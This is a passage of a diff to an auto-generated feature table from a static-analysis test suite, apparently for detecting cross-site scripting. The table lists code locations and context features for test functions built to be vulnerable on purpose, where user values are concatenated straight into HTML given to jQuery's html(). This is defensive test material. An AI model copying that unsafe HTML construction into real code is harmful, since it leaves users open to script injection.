autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | $("#foo ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | $("#foo ... span>") | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | $("#foo ... span>") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | $("#foo ... span>") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | $("#foo ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | exceptional return of $("#foo ... span>") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | exceptional return of $("#foo ... span>") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | exceptional return of $("#foo ... span>") | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | exceptional return of $("#foo ... span>") | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:9:85:50 | exceptional return of $("#foo ... span>") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:11:85:16 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:11:85:16 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:11:85:16 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23329,12 +153226,22 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:11:85:16 | "#foo" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:11:85:16 | "#foo" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:11:85:16 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:19:85:22 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:19:85:22 | html | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:19:85:22 | html | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:19:85:22 | html | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:19:85:22 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:31 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:31 | "" | contextSurroundingFunctionParameters | (val) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:31 | "" | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:31 | "" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:31 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:31 | "" | stringConcatenatedWith | -endpoint- val + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:37 | "" + val | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:37 | "" + val | contextSurroundingFunctionParameters | (val) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:37 | "" + val | enclosingFunctionBody | val val string $ #foo html val val number $ #foo html val val boolean $ #foo html val | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:37 | "" + val | enclosingFunctionName | types | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:37 | "" + val | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:49 | " ... /span>" | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:49 | " ... /span>" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:24:85:49 | " ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23354,12 +153261,62 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:41:85:49 | "" | enclosingFunctionName | types | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:41:85:49 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:85:41:85:49 | "" | stringConcatenatedWith | '' + val -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:89:0 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:89:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:89:0 | this | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:89:0 | this | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:89:0 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | 'arguments' object of function createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | 'arguments' object of function createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | 'arguments' object of function createHTML | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | 'arguments' object of function createHTML | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | 'arguments' object of function createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | exceptional return of function createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | exceptional return of function createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | exceptional return of function createHTML | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | exceptional return of function createHTML | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | exceptional return of function createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | functio ... OT OK\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | functio ... OT OK\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | return of function createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | return of function createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | return of function createHTML | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | return of function createHTML | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:1:91:1 | return of function createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:10:89:19 | createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:10:89:19 | createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:10:89:19 | createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:10:89:19 | createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:10:89:19 | createHTML | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:10:89:19 | createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:10:89:19 | createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:89:21:89:21 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:19 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:19 | "" | contextSurroundingFunctionParameters | (x) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:19 | "" | enclosingFunctionBody | x x | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:19 | "" | enclosingFunctionName | createHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:19 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:19 | "" | stringConcatenatedWith | -endpoint- x + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:23 | "" + x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:23 | "" + x | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:23 | "" + x | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:23 | "" + x | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:23 | "" + x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:35 | " ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:35 | " ... /span>" | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:35 | " ... /span>" | enclosingFunctionBody | x x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:35 | " ... /span>" | enclosingFunctionName | createHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:12:90:35 | " ... /span>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:23:90:23 | x | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:23:90:23 | x | contextSurroundingFunctionParameters | (x) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:23:90:23 | x | enclosingFunctionBody | x x | @@ -23372,10 +153329,93 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:27:90:35 | "" | enclosingFunctionName | createHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:27:90:35 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:90:27:90:35 | "" | stringConcatenatedWith | '' + x -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:29 | module. ... ateHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:29 | module. ... ateHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:93:29 | module. ... ateHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:95:1 | module. ... (x));\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:95:1 | module. ... (x));\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:1:95:1 | module. ... (x));\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:8:93:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:8:93:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:8:93:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:16:93:29 | usesCreateHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:16:93:29 | usesCreateHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:16:93:29 | usesCreateHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | createHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | createHTML | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | createHTML | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | createHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | this | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | this | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:93:32 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | 'arguments' object of anonymous function | enclosingFunctionBody | x $ #foo html createHTML x | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:93:33:95:1 | 'arguments' object of 